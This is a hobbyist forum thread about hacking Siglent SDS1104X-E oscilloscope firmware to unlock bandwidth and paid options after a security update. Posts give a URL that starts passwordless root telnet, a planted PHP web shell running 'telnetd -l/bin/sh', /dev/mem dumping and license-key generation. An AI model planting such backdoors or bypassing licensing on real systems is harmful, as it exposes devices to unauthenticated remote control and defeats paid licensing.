Last December, there has been quite some agitation regarding network security of Siglent oscilloscopes (SDS1202X-E in that particular case). Sec Consult, a company who makes their living by finding security holes in computer systems, treated a cheap entry level lab instrument (which will usually be connected to an isolated local network only, if at all) the same way as a computer that is connected to the public internet.

The forum community here acted cool and stayed calm - except for the usual Siglent bashers - just because it's a non-issue if the instrument is properly used and then the majority of test gear out there (no matter how expensive) have similar vulnerabilities.

Nevertheless, the Sec Consult article has been spread in many online media and Siglent had to respond somehow, promising to raise the security level on their devices. This is why it has been decided to close the all too obvious and all too easily accessible backdoors.

At the same time, this latest firmware also deals with a valid complaint by serveral users and increased the max. length of the WiFi WPA2 PSK Key to 63 characters.

I can assure you that Siglent doesn't give a 2nd thought about students and hobbyists hacking their gear and they are not willing to put any effort in preventing that, but the bad press because of the network security issue just could not be ignored and thus had to be addressed.
 
The following users thanked this post: patman27

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #93 on: May 25, 2019, 09:58:02 am »
The SHELLCMD was more of a potential root exploit, so not a bad thing it was removed, (there are still ways in, they just now require physical access) It would be like any other networked device being able to run at root with no authentication.

I suspect I was part of the reason why that command was dragged to the surface, and may have lead to it being published against, If so, I do apologize Performa01, Not being infosec, waving a flag that says here is a command that will run arbitary code as Root was not my first though. more hunting for bode plot controls before I found the command to just press the buttons, and because there is no online updating, that possibility is nicely closed off.
« Last Edit: May 25, 2019, 10:12:56 am by Rerouter »
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #94 on: May 25, 2019, 10:35:16 am »
The SHELLCMD was more of a potential root exploit, so not a bad thing it was removed, (there are still ways in, they just now require physical access) It would be like any other networked device being able to run at root with no authentication.

I suspect I was part of the reason why that command was dragged to the surface, and may have lead to it being published against, If so, I do apologize Performa01, Not being infosec, waving a flag that says here is a command that will run arbitary code as Root was not my first though. more hunting for bode plot controls before I found the command to just press the buttons, and because there is no online updating, that possibility is nicely closed off.
No worries!

SEC Consult discovered the vulnerabilities in the middle of 2018 already - I think that was long before the SHELLCMD method was published here. And then it was about the SDS1202X-E, which did not have neither an integrated webserver nor WiFi (at least back at that time).
Half a year later, SEC Consult published their findings, because Siglent failed to respond properly (to their liking) in time. After that, Siglent was forced to do something about it, i.e. promised to close the identified security threats with the next firmware update. So you certainly need not feel bad or guilty - like you and others have said, it's not a bad thing to close backdoors that can actually be remote accessed over the LAN.
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #95 on: May 25, 2019, 11:54:47 am »
Ok. So I have figured out a quite easy method to set up a SDS1104X-E on previous firmware *.*.6.1.26, to have password free shell access on port 9999 that survives an upgrade to 6.1.33. So I can enable shell access on 6.1.33.

Not sure I should post it here publicly now as it would be very easy to block in next update. I suppose we could pass it around by private message but that could be a hassle. What do you think - post it publicly or private message?

Also just as an aside, my 200MHz upgrade applied by licence key is still active in 6.1.33.

 
The following users thanked this post: patman27, Illusionist

Offline boblatino

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #96 on: June 04, 2019, 07:01:35 am »
Hi @Gege34, I was able to get the keys and activate all the options with the dump on my SDS1104X-E but what I found is that before the activation keys it shows 200M instead of 100M (which is what my scope is supposed to be). Does that imply that mine came already activated as a 200Mhz scope? Should I try to enter the key to change the BW?

Thanks
 
The following users thanked this post: bluejedi, Asedious

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #97 on: June 04, 2019, 09:43:00 am »
The activated option is show two time. So if you see 200 two time, it means you have the 200MHz option activated.
Whatever the result, you can try the BW without problem.
 

Offline dalhend

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #98 on: June 09, 2019, 01:52:05 pm »
Ok. So I have figured out a quite easy method to set up a SDS1104X-E on previous firmware *.*.6.1.26, to have password free shell access on port 9999 that survives an upgrade to 6.1.33. So I can enable shell access on 6.1.33.

Not sure I should post it here publicly now as it would be very easy to block in next update. I suppose we could pass it around by private message but that could be a hassle. What do you think - post it publicly or private message?

Also just as an aside, my 200MHz upgrade applied by licence key is still active in 6.1.33.


Hi Plurn... I'd like to here of your 6.1.33 workaround to the shellcmd issue.....  Please email me, if you feel that's best...

First post, and BTW I also thank everyone for the hints and tips to get the 1104 upgraded.  I was sidetracked along the way, but eventually focused on this and was successful.
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #99 on: June 11, 2019, 01:17:08 am »

Hi Plurn... I'd like to here of your 6.1.33 workaround to the shellcmd issue.....
...

details supplied via personal message.
 

Offline n3mmr

  • Regular Contributor
  • *
  • Posts: 94
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #100 on: June 11, 2019, 10:36:35 am »

Hi Plurn... I'd like to here of your 6.1.33 workaround to the shellcmd issue.....
...

details supplied via personal message.

Can I also partake of your way to achieve password free telnet access in release 33?
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #101 on: June 11, 2019, 05:21:17 pm »
Can I also partake of your way to achieve password free telnet access in release 33?

details supplied via personal message.

For anyone else that wants this, I suggest request it here like n3mmr has done and anyone who has been given the details can send the details to the person requesting via personal message. Then put a note in this thread saying it has been supplied.

Just in case I am not around to provide the info.

That is just a suggestion - you can do as you please of course.
 
The following users thanked this post: RedSpanner, dalhend

Offline sundance

  • Regular Contributor
  • *
  • Posts: 55
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #102 on: June 11, 2019, 06:16:07 pm »
@plurn | n3mmr:
Mind to send me a PM?
 

Offline timgiles

  • Regular Contributor
  • *
  • Posts: 238
  • Country: se
  • Programmer, DB architect
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #103 on: June 11, 2019, 06:47:15 pm »
@anyone who who has the PM or wrote the original - can you pm timgiles :-) thank you in advance
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #104 on: June 11, 2019, 07:07:34 pm »
Can someone PM Plurn workaround

Thanks In Advanced
Mike
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #105 on: June 11, 2019, 09:44:31 pm »
Run the update (one time only) and do:

http://<scope_IP>/web_img/startTelnet9999.php

The rest is self-explanatory.

Made by plurn.
« Last Edit: June 14, 2019, 05:09:23 pm by tv84 »
 
The following users thanked this post: rf-loop, MT, plurn, RedSpanner, BillB, bluejedi, jousis, Manx, ScottW, melwin, Sabagmn, davor8

Offline starlight_tools

  • Contributor
  • Posts: 17
  • Country: ca
    • Starlight Tools
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #106 on: June 12, 2019, 05:20:36 am »
Plurn, I would appreciate a copy of your work around as well please.
Walter Townsend, TTDr
 
The following users thanked this post: Higginse

Offline tek2232

  • Contributor
  • Posts: 15
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #107 on: June 12, 2019, 05:32:51 am »
Plurn can you send me a copy ?

Thanks
 

Offline plurn

  • Regular Contributor
  • *
  • Posts: 94
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #108 on: June 12, 2019, 05:51:30 am »
@ sundance timgiles MikeLud starlight_tools tek2232

details will be supplied via personal message in the next few minutes.
 
The following users thanked this post: starlight_tools, tek2232, sundance, MikeLud

Offline toodle

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #109 on: June 12, 2019, 08:57:39 pm »
Hi,
Can I also get a pm of your way to achieve password free telnet access in release 33?
Thanks in advance
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #110 on: June 12, 2019, 09:56:11 pm »
toodle PM sent
 

Offline Higginse

  • Newbie
  • Posts: 1
  • Country: ie
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #111 on: June 13, 2019, 08:03:57 am »
Likewise I would appreciate a copy of the workaround info if you wouldn't mind.
Thanks in advance.
 

Offline melwin

  • Contributor
  • Posts: 6
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #112 on: June 13, 2019, 04:32:43 pm »
Any chance I could learn the magic incantation as well? Would be much appreciated! Thanks.
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #113 on: June 14, 2019, 04:33:13 pm »
@plurn I too would appreciate a copy of the workaround info.
Thanks in advance.
« Last Edit: June 19, 2019, 10:13:03 pm by bluejedi »
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #114 on: June 14, 2019, 05:10:37 pm »
Check my previous (edited) post.
 
The following users thanked this post: patman27, bluejedi, melwin

Offline jousis

  • Newbie
  • Posts: 1
  • Country: gr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #115 on: June 14, 2019, 07:51:09 pm »
One more question, will the hack mess the SAG1021 license ?


edit. it took me a while, sorry :D
« Last Edit: June 15, 2019, 09:30:51 pm by jousis »
 
The following users thanked this post: Higginse

Offline KungFuJosh

  • Frequent Contributor
  • **
  • Posts: 300
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #116 on: June 16, 2019, 04:35:53 pm »
The .33 firmware is annoying! There's so many extra steps to do basic things like setting probe attenuation. Before this stupid firmware, turning the dial would easily adjust. Now you have to select it, go to the next screen, select it again, and then turn the knob.  |O
"I installed a skylight in my apartment yesterday... The people who live above me are furious." - Steven Wright
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #117 on: June 16, 2019, 08:10:25 pm »
The .33 firmware is annoying! There's so many extra steps to do basic things like setting probe attenuation. Before this stupid firmware, turning the dial would easily adjust. Now you have to select it, go to the next screen, select it again, and then turn the knob.  |O

this is due to fact that the same firmware (executable) seems to compiled for different models, so one can find inside as well SDS5000X, SDS2000X-E, SDS1000X-E and SDS2000X+(10bit, what?), where some of these models support active probe and their information/calibration - that's why the menu has been changed

EDIT: actually deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm
« Last Edit: June 16, 2019, 09:13:38 pm by tinhead »
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #118 on: June 16, 2019, 09:33:58 pm »
EDIT: actually deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm

Because they are using the same source code as in the SDS5000X... Nothing more.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #119 on: June 16, 2019, 09:47:51 pm »
EDIT: actually deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm
Oh, juicy.  :)
Actually I need MIL-1553 as an option for one of my customers classroom sets of SDS1202X-E for cadet training use.....nice to know it's part of later FW but I did suspect it was.  ;)

All we need now is to work on enabling it.  :P
Avid Rabid Hobbyist
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #120 on: June 17, 2019, 07:47:11 am »
Its fully baked in there. Its just the access chain for the menus are missing if you try using the specific commands you will soft lock the scope application.

They also hard coded the menu tree unlike previous versions. (I wonder why  ;. ) its not yet obvious to me where the menu / UI thread is. As I know where the menu entry points are. They are just dereferenced.

Personally I would love the option to buy the canfd decoder
 
The following users thanked this post: tautech, patman27

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #121 on: June 17, 2019, 05:47:13 pm »
EDIT: actually deep look inside the .33 firmware shows as well other interesting things, like MIL-1553 or Flex options, not only new 10bit DSO SDS2000XPlus, hmm

Because they are using the same source code as in the SDS5000X... Nothing more.

that's right, but on the other hand what the firmware is doing depends on model name, i tried already SDS2000X-E binary on SDS1000X-E and was of course nothing special, it worked exactly as the SDS1000X-E firmware did. So vice versa it could be possible to lie about hardware version to get 2000 series features running on 1000 series.


Personally I would love the option to buy the canfd decoder

the firmware does read and evaluate at least options_canfd_cfg.bin files, once i placed it (copy of my unused wifi_cfg.bin), it immediately created options_canfd_times.txt, even if this is not available feature on 1000X-E, so the hope remains (however, there are some changes to licensing check, some extra _md5_ here and there ...)
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #122 on: June 17, 2019, 06:26:13 pm »
that's right, but on the other hand what the firmware is doing depends on model name, i tried already SDS2000X-E binary on SDS1000X-E and was of course nothing special, it worked exactly as the SDS1000X-E firmware did. So vice versa it could be possible to lie about hardware version to get 2000 series features running on 1000 series.

But the 1000 and 2000 are equal in terms of Options licenses, so no much gain there.

The big question is: did you see anywhere the use of a 5000 option in a 1000/2000 menu?

Because running the 5000 FW in the 1000 should be another ballgame...

PS: is it possible to trigger, for example,  CANFD analysis/decoding via SCPI?
« Last Edit: June 17, 2019, 06:29:08 pm by tv84 »
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #123 on: June 20, 2019, 12:18:35 am »
I tried several memory dumps made via web interface/SCPI but I am unable to find my scope id in the dump. I can only find a sequence of at most 2 scope id bytes matching in memory but not more. I'm running v7.1.6.1.26 + root telnet access patch (the one that requires root pwd).

I also tried to make a dump via telnet with: cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump10.bin but this consistently fails with the following error: cat: read error: Bad address

Are there any other possibilities to extract the keys from the scope?
« Last Edit: June 20, 2019, 12:35:48 am by bluejedi »
 

Offline bluejedi

  • Contributor
  • Posts: 36
  • Country: nl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #124 on: June 20, 2019, 12:28:30 am »
Run the update (one time only) and do:

http://<scope_IP>/web_img/startTelnet9999.php

Install the attached .ads before or after the 6.1.33 update?
« Last Edit: June 20, 2019, 12:33:01 am by bluejedi »
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #125 on: June 21, 2019, 01:16:06 am »
... SDS2000X+(10bit, what?), ...
...
... new 10bit DSO SDS2000XPlus ...
SDS2000X+ is the successor of the SDS2000X, currently still under development. It will not be a 10bit DSO.
 

Offline Gege34

  • Contributor
  • Posts: 22
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #126 on: June 21, 2019, 06:54:50 am »
Install the attached .ads before or after the 6.1.33 update?
Install the .ads after updated to 6.1.33.

To find your keys, I recommand to perform a factory reset and do the memory dump just after power on the scope.
 
The following users thanked this post: patman27, bluejedi

Offline jemangedeslolos

  • Frequent Contributor
  • **
  • Posts: 355
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #127 on: June 21, 2019, 10:34:10 am »
... SDS2000X+(10bit, what?), ...
...
... new 10bit DSO SDS2000XPlus ...
SDS2000X+ is the successor of the SDS2000X, currently still under development. It will not be a 10bit DSO.

Hello Performa01,

Do you have additional information regarding this SDS2000X+ ??
spec ? price ?
approx release date ?

Thank you :)
 

Offline Performa01

  • Frequent Contributor
  • **
  • Posts: 940
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #128 on: June 21, 2019, 04:04:08 pm »
Do you have additional information regarding this SDS2000X+ ??
Sorry, but I don't know anything yet. All I know is that there most definitely is no 10bit scope in the pipeline.
 

Offline ffabi

  • Newbie
  • Posts: 1
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #129 on: July 04, 2019, 06:39:32 pm »
Hello @plurn or anyone that knows the workaround
Could you please sende me the workaround for the .33

Thank you very much
 

Offline Illusionist

  • Regular Contributor
  • *
  • Posts: 111
  • Country: gb
  • Why is the rum gone?
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #130 on: July 05, 2019, 11:02:45 pm »
PM sent ffabi :)
Agilent 34410A, GW Instek 8251A, Thurlby 1905A, Siglent DS1104X-E(unlocked), SDG1032X(unlocked), Micsig DP10013 MX, LeCroy PP008 500MHz Probes, Fluke 179
 

Offline crasymicci

  • Newbie
  • Posts: 1
  • Country: ru
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #131 on: July 15, 2019, 09:19:40 pm »

Hello , and for  me too, please   ::)   :)
 @plurn or anyone that knows the workaround
 please sende me the workaround for the ..33

Very Big Thanks !
 

Offline coy

  • Newbie
  • Posts: 3
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #132 on: August 17, 2019, 11:06:19 pm »
Hey,

I just took the chance before updating to 6.1.33 and did the update of bandwidth. I used the dump created with SHELLCMD, the key was easy to find in my case and MCBD <key> worked.

Then I started the telnetd without password on port 9999, logged into the device, remounted /usr/bin/siglent as rw and put my own backdoor in the lighttpd cgi directory:

Quote
/usr/bin/siglent/config/www # cat telnetd.php
<?php
shell_exec('telnetd -l/bin/sh -p9999');
?>

Then I did the update to 6.1.33, 200M bw is kept, and backdoor still working  :)

Thanks for your investigations!
 
The following users thanked this post: patman27

Offline KK

  • Regular Contributor
  • *
  • Posts: 100
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #133 on: October 06, 2019, 05:26:10 am »
Please PM workaround. Thanks!
 

Offline philtulju

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #134 on: October 11, 2019, 11:46:47 pm »
Hello, I'm interested in the .6.1.33 workaround!
Great discussion and lots of good information here, thanks you all.
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #135 on: October 25, 2019, 08:42:05 am »
I have the idea to buy a sds1104x to have something to "tinker on" in my christmas vacation.

I read all threads a year ago... and hacking was easy and a no brainer. But then I had no time for a new toy... and stuck to the scopes I could use at my work. And to be honest... these would be more than sufficient for my needs.

But nevertheless, now I'm on the jump to get one. But now after reading I'm confused. Especially because I have no scope on my bench for checking things out by myself.

So please give me some hints... if buying with hacking in mind is still an option. And I mean it as an "option" -- because I possibly wouldn't make use of that.

So... is it possible to hack the 100 MHz to 200 MHz and get the internal signal generator and the other add-ons running?

And is it possible to downgrade any FW (6.1.33 and up) to a hackable version... and then hack and upgrade back with than activated upgrades?

An advice would be great.

And a PM with special instructions -- if necessary -- would be appreciated.

thx
Kai
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #136 on: October 25, 2019, 08:50:27 am »
the internal signal generator......
The sig gen is an additional external HW option, SAG1021.
Avid Rabid Hobbyist
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #137 on: October 25, 2019, 08:58:09 am »
Quote
The sig gen is an additional external HW option, SAG1021.

I had in my memory that one could upgrade to some kind of internal software function generator as one channel... and an additional hardware box as a second channel.

But I have to admit... I read all the specs and features of the possible "around 500€" oscilloscopes a year ago and may mix things up.

Writing this I checked the product page of the seller: SDS1000X-E-FG as software upgrade is needed in addition.
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #138 on: October 25, 2019, 09:04:21 am »
nope, single external channel via AWG device, it is not a 2 channel sig-gen, that other BNC acts as a trigger in / out,

You can modulate 1 waveform with another, but not with external input.

For similar money you can buy an entry level AWG siglent device, and use that via usb instead for bode plot
« Last Edit: October 25, 2019, 09:07:31 am by Rerouter »
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #139 on: October 25, 2019, 09:05:32 am »
Quote
The sig gen is an additional external HW option, SAG1021.

I had in my memory that one could upgrade to some kind of internal software function generator as one channel... and an additional hardware box as a second channel.

But I have to admit... I read all the specs and features of the possible "around 500€" oscilloscopes a year ago and may mix things up.

Writing this I checked the product page of the seller: SDS1000X-E-FG as software upgrade is needed in addition.
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.
Avid Rabid Hobbyist
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #140 on: October 25, 2019, 09:28:47 am »
Quote
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.

Which is a quite interesting concept of selling a pricey black-box without a software for using it. The simple Shenzhen 2ch function generator with it's own display I use for playing around costs less than half the price of that box (well: Of course, I got the quality I paid for ;-).

All these options are nice to have... but not necessary... therefore, not an option to pay for. I wouldn't even need more than 50 MHz because of the scopes I have at work for that occasions.

So the question stays: The state of the hack? And I shouldn't have said this sentence to a board member with a "NZ Siglent Distributor" in his description ;-)
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #141 on: October 25, 2019, 09:30:31 am »
For similar money you can buy an entry level AWG siglent device, and use that via usb instead for bode plot

Which is my plan, if I buy a Siglent scope.
 

Online Rerouter

  • Super Contributor
  • ***
  • Posts: 4666
  • Country: au
  • Question Everything... Except This Statement
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #142 on: October 25, 2019, 09:54:14 am »
State of the hack, different method, but still works, just dig around a bit,

They are not opposed to us doing whatever we want with our hardware when we get it, they are opposed to remote vulnerabilities.
 

Offline KaLi

  • Contributor
  • Posts: 10
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #143 on: October 25, 2019, 10:16:42 am »
State of the hack, different method, but still works, just dig around a bit,

They are not opposed to us doing whatever we want with our hardware when we get it, they are opposed to remote vulnerabilities.

Good to read that. I'm not even sure that (if I buy that scope) I would use the hack. But to have "options" is a well respected bonus-feature in my decision making process.

So everything is open in the forum... and no PM is needed?
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #144 on: October 25, 2019, 06:43:13 pm »
Quote
Correct, to get AWG usage of SAG1021 you need the FG option once the free trial usages expire.

Which is a quite interesting concept of selling a pricey black-box without a software for using it.
Only the AWG functionality is optioned and SAG1021 gives free and unhindered use for Bode plot.

The best solution is to have a standalone AWG and the Siglent ones allow for seamless SDS1*04X-E connectivity for Bode plot use. They work in the same way as SAG1021 in that they are totally controlled by the scopes Bode plot feature.


Quote
And I shouldn't have said this sentence to a board member with a "NZ Siglent Distributor" in his description ;-)
Fear not, a good amount of my own Siglent equipment is 'improved'.  ;)
Avid Rabid Hobbyist
 

Offline MikeLud

  • Regular Contributor
  • *
  • Posts: 221
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #145 on: October 25, 2019, 10:10:24 pm »
Another option to a Siglent AWG that works with the scope's Bode Plot is in the below link

https://www.eevblog.com/forum/testgear/siglent-sds1104x-e-and-sds1204x-e-bode-plot-with-non-siglent-awg/
 

Offline Sabagmn

  • Supporter
  • ****
  • Posts: 1
  • Country: ch
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #146 on: October 26, 2019, 07:40:00 am »
Hello

Could anyone share Plurn's workaround with me? Either by PM or email.
Thank you very much.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #147 on: October 26, 2019, 08:18:36 am »
Hello

Could anyone share Plurn's workaround with me? Either by PM or email.
Thank you very much.

Msg #105.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #148 on: October 26, 2019, 10:40:33 am »
Just after having posting this, I thought a little and think one could easily patch the app to allow the scope to accept the 250 Mhz and 300 MHz models.

That would be interesting to see how the FW/HW would react...   :-DD

Volunteers, opinions?   ;)
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #149 on: October 26, 2019, 03:47:44 pm »
Just after having posting, I thought a little and think one could easily patch the app to allow the scope to accept the 250 Mhz and 300 MHz models.

That would be interesting to see how the FW/HW would react...   :-DD

Volunteers, opinions?   ;)

i tested SDS1204X-E with generated license keys (250 and 300 models), got model name displayed, but in the reality the DSO switched back to 70MHz model (~, based on risetime). Haven't tested 350 and 500MHz keys, but 750M / 1G (model name goes empty, SDS worked strange instable, after some playing had to restore nand, risetime as 70MHz model) and MAX key (lic key not accepted). I can't prove anymore, but as i started to play with 300MHz lic, it was not acepted / model Name not changed, till i applied once 1G lic key, rebooted, and 300MHz (so in principle made model empty with out of range/scope lic, and then 300MHz key). Since then, even after nand restore, i can use 300M lic key. So maybe real, or coincident, or maybe i was too stoned as i tested it first time.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #150 on: October 26, 2019, 04:24:55 pm »
Sorry tin, but I didn't fully understood your answer.

But, I'm not saying to just license it to 250 or 300. One must patch the app so that those are recognized as possible options, then we should license it. Or did you do that also?

The FW hasn't support for licenses > 300 MHz so, any BW out of range should result in 70 MHz because this BW is the last in the list of possible BW values (as coded in the FW). My guess...
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #151 on: October 26, 2019, 04:54:23 pm »
Sorry tin, but I didn't fully understood your answer.

which part? :P

But, I'm not saying to just license it to 250 or 300. One must patch the app so that those are recognized as possible options, then we should license it. Or did you do that also?

no, i haven't. All i did was to play with keys and some fw Option files (tried to force the app to work properly), but never tried to patch the app itself to get it working (as patch can't be simply updated). However, i'm here if you need volunteer.

The FW hasn't support for licenses > 300 MHz so, any BW out of range should result in 70 MHz because this BW is the last in the list of possible BW values (as coded in the FW). My guess...

right, everything accepted but not implemented (or not supported or blocked) defaults to 70M. Keys for 250 and 300M are working (model name/type), but not the bw. Key > 300 and < MAX are unknown, so still 70M bw but this time no model type (few empty fields here and there, so nobody really knows how dangerous is to use them. I had to reflash nand to get my SDS woking again). The "MAX" key is not known for SDS1000X-E series (it is part of SDS5000).
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #152 on: October 26, 2019, 05:23:06 pm »
1 - :D  (No need because this last answer cleared my doubts.)
2 - OK. I'll send you the info although another poweruser is also researching ATM.   ;D
3 - I confirm all that. And thanks for the warning although I would not suggest going beyond the 300M mark.

The "MAX" key is not known for SDS1000X-E series (it is part of SDS5000).

AFAIK only works on SDS2000X-E, not even SDS5000X !

Enables approx. 400 MHz.
« Last Edit: October 26, 2019, 06:38:06 pm by tv84 »
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
